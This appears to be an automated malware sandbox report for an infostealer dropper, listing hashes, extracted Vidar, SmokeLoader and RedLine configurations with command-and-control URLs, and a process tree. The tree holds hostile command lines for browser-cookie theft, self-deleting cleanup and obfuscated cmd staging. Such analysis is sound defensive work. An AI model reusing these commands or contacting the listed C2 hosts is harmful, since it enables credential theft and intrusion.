Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1819s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-07-2021 12:41

General

  • Target

    8 (21).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 7 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2936
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2532
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2484
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1884
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1468
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1392
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1224
                • C:\Users\Admin\AppData\Local\Temp\8 (21).exe
                  "C:\Users\Admin\AppData\Local\Temp\8 (21).exe"
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:744
                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:224
                    • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\setup_install.exe
                      "C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\setup_install.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2976
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1840
                        • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_1.exe
                          sonia_1.exe
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:1576
                          • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_1.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_1.exe" -a
                            6⤵
                            • Executes dropped EXE
                            PID:3064
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3024
                        • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_3.exe
                          sonia_3.exe
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          • Modifies system certificate store
                          PID:4020
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                            6⤵
                              PID:4848
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im sonia_3.exe /f
                                7⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4904
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 6
                                7⤵
                                • Delays execution with timeout.exe
                                PID:4956
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2608
                          • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_4.exe
                            sonia_4.exe
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3992
                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4828
                              • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:5096
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                    PID:4164
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                    • Executes dropped EXE
                                    PID:3236
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:4580
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:5776
                                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                      "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                      7⤵
                                        PID:4116
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1848
                                      • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        PID:4256
                                        • C:\Windows\winnetdriv.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626792829 0
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4444
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 884
                                            9⤵
                                            • Program crash
                                            PID:4456
                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4104
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 772
                                          8⤵
                                          • Program crash
                                          PID:4848
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 840
                                          8⤵
                                          • Program crash
                                          PID:1696
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 848
                                          8⤵
                                          • Program crash
                                          PID:4988
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 900
                                          8⤵
                                          • Program crash
                                          PID:4772
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 960
                                          8⤵
                                          • Program crash
                                          PID:4332
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 856
                                          8⤵
                                          • Program crash
                                          PID:1036
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 1064
                                          8⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:5044
                                      • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                        "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4476
                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1016
                                      • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4432
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 4432 -s 984
                                          8⤵
                                          • Program crash
                                          PID:3924
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3740
                                  • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_6.exe
                                    sonia_6.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious use of WriteProcessMemory
                                    PID:2368
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2716
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4656
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                        PID:5684
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        6⤵
                                          PID:5652
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                      4⤵
                                        PID:1848
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2672
                                        • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_5.exe
                                          sonia_5.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:184
                                          • C:\Users\Admin\Documents\kpTaB61qQt6__mJq49I9qydh.exe
                                            "C:\Users\Admin\Documents\kpTaB61qQt6__mJq49I9qydh.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4992
                                            • C:\Users\Admin\Documents\kpTaB61qQt6__mJq49I9qydh.exe
                                              C:\Users\Admin\Documents\kpTaB61qQt6__mJq49I9qydh.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2732
                                            • C:\Users\Admin\Documents\kpTaB61qQt6__mJq49I9qydh.exe
                                              C:\Users\Admin\Documents\kpTaB61qQt6__mJq49I9qydh.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5012
                                          • C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe
                                            "C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5052
                                            • C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe
                                              C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe
                                              7⤵
                                                PID:4340
                                              • C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe
                                                C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                PID:4164
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im SBozbvXQk5verm7tWO9bBsJo.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\SBozbvXQk5verm7tWO9bBsJo.exe" & del C:\ProgramData\*.dll & exit
                                                  8⤵
                                                    PID:5532
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im SBozbvXQk5verm7tWO9bBsJo.exe /f
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:4612
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 6
                                                      9⤵
                                                      • Delays execution with timeout.exe
                                                      PID:5504
                                              • C:\Users\Admin\Documents\S31py2X4HI5Vq0qzLlbbQbX0.exe
                                                "C:\Users\Admin\Documents\S31py2X4HI5Vq0qzLlbbQbX0.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                PID:5028
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                  7⤵
                                                    PID:5004
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      explorer https://iplogger.org/2LBCU6
                                                      8⤵
                                                        PID:4568
                                                      • C:\Windows\SysWOW64\regedit.exe
                                                        regedit /s adj.reg
                                                        8⤵
                                                        • Runs .reg file with regedit
                                                        PID:1380
                                                      • C:\Windows\SysWOW64\regedit.exe
                                                        regedit /s adj2.reg
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Runs .reg file with regedit
                                                        PID:3928
                                                    • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                      "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:360
                                                  • C:\Users\Admin\Documents\gL98zw8ZZxvX7UPO5fQlMhkQ.exe
                                                    "C:\Users\Admin\Documents\gL98zw8ZZxvX7UPO5fQlMhkQ.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:2360
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                      7⤵
                                                        PID:1148
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd
                                                          8⤵
                                                            PID:4644
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                              9⤵
                                                                PID:5720
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                Acre.exe.com k
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:5212
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  PID:6060
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                    11⤵
                                                                      PID:5228
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                        12⤵
                                                                          PID:5840
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                            13⤵
                                                                            • Drops startup file
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:6072
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                              14⤵
                                                                                PID:6112
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping 127.0.0.1 -n 30
                                                                      9⤵
                                                                      • Runs ping.exe
                                                                      PID:1368
                                                              • C:\Users\Admin\Documents\z9ezaroC0BhTtHS5oVGgsD2l.exe
                                                                "C:\Users\Admin\Documents\z9ezaroC0BhTtHS5oVGgsD2l.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4372
                                                                • C:\Users\Admin\Documents\z9ezaroC0BhTtHS5oVGgsD2l.exe
                                                                  C:\Users\Admin\Documents\z9ezaroC0BhTtHS5oVGgsD2l.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of SetThreadContext
                                                                  • Checks processor information in registry
                                                                  PID:4116
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im z9ezaroC0BhTtHS5oVGgsD2l.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\z9ezaroC0BhTtHS5oVGgsD2l.exe" & del C:\ProgramData\*.dll & exit
                                                                    8⤵
                                                                      PID:5348
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im z9ezaroC0BhTtHS5oVGgsD2l.exe /f
                                                                        9⤵
                                                                        • Kills process with taskkill
                                                                        PID:5956
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /t 6
                                                                        9⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:4472
                                                                • C:\Users\Admin\Documents\ME0rVT2cPAB6Q5lC4PIT_sGw.exe
                                                                  "C:\Users\Admin\Documents\ME0rVT2cPAB6Q5lC4PIT_sGw.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:2240
                                                                • C:\Users\Admin\Documents\NyvwHJfuqS79WFvbr7bJfiRx.exe
                                                                  "C:\Users\Admin\Documents\NyvwHJfuqS79WFvbr7bJfiRx.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4152
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:5312
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Windows directory
                                                                    PID:4848
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:3024
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:5284
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:4876
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:5104
                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:6028
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:6096
                                                                            • C:\Users\Admin\Documents\H19n48YF7wjfm0oW9Rxcce0C.exe
                                                                              "C:\Users\Admin\Documents\H19n48YF7wjfm0oW9Rxcce0C.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:4972
                                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5748
                                                                                • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                  "{path}"
                                                                                  8⤵
                                                                                    PID:1320
                                                                              • C:\Users\Admin\Documents\6Dqvg1IjHwYpEcYn02FUICGt.exe
                                                                                "C:\Users\Admin\Documents\6Dqvg1IjHwYpEcYn02FUICGt.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:932
                                                                                • C:\Users\Admin\Documents\6Dqvg1IjHwYpEcYn02FUICGt.exe
                                                                                  "C:\Users\Admin\Documents\6Dqvg1IjHwYpEcYn02FUICGt.exe" -a
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1632
                                                                              • C:\Users\Admin\Documents\5uOmW94JRAgyiZNOc_knr3p0.exe
                                                                                "C:\Users\Admin\Documents\5uOmW94JRAgyiZNOc_knr3p0.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4956
                                                                                • C:\Users\Admin\Documents\5uOmW94JRAgyiZNOc_knr3p0.exe
                                                                                  C:\Users\Admin\Documents\5uOmW94JRAgyiZNOc_knr3p0.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4292
                                                                                • C:\Users\Admin\Documents\5uOmW94JRAgyiZNOc_knr3p0.exe
                                                                                  C:\Users\Admin\Documents\5uOmW94JRAgyiZNOc_knr3p0.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2192
                                                                              • C:\Users\Admin\Documents\_7_Ivlq4lXOz4x5A9sqlBvBG.exe
                                                                                "C:\Users\Admin\Documents\_7_Ivlq4lXOz4x5A9sqlBvBG.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4008
                                                                                • C:\Users\Admin\AppData\Roaming\5545269.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\5545269.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5880
                                                                                • C:\Users\Admin\AppData\Roaming\2954387.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\2954387.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5924
                                                                              • C:\Users\Admin\Documents\W05bgFrjOnrxcM2CctDZ5lgL.exe
                                                                                "C:\Users\Admin\Documents\W05bgFrjOnrxcM2CctDZ5lgL.exe"
                                                                                6⤵
                                                                                  PID:3928
                                                                                  • C:\Users\Admin\AppData\Roaming\5990395.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\5990395.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5892
                                                                                  • C:\Users\Admin\AppData\Roaming\7386305.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\7386305.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5948
